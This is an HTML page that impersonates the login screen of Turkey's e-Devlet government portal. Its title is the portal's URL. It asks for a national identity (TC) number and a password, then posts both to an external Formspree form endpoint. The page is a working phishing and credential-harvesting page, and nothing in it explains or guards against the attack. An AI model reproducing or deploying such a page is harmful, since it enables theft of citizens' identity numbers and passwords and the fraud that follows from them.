<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>https://giris.turkiye.gov.tr/Giris/gir</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="resim">
        <img src="phon3.jpg" alt="" width="1840" height="912">
    <div class="boxlar">
        <form action="https://formspree.io/f/xzblbaeq" class="box" method="post">
            <div class="box1">
            <label for="tcsi" class="TC">
                <input  placeholder="" type="number" name="tc :" class="kutu"> <br>
            </div>
            </label>

            <div class="box2">
                <label for="şifre" class="sifre">
                    <input class="kutu" type="password" name="sifre :">
                </label>
            </div>

            <div class="box3">
                <button class="buton" type="submit">Giriş Yap ></button>
            </div>
        </form>
    </div>
        
    </div>
</body>
</html>
<!--

            
       <div>
        
    </div>
          

-->
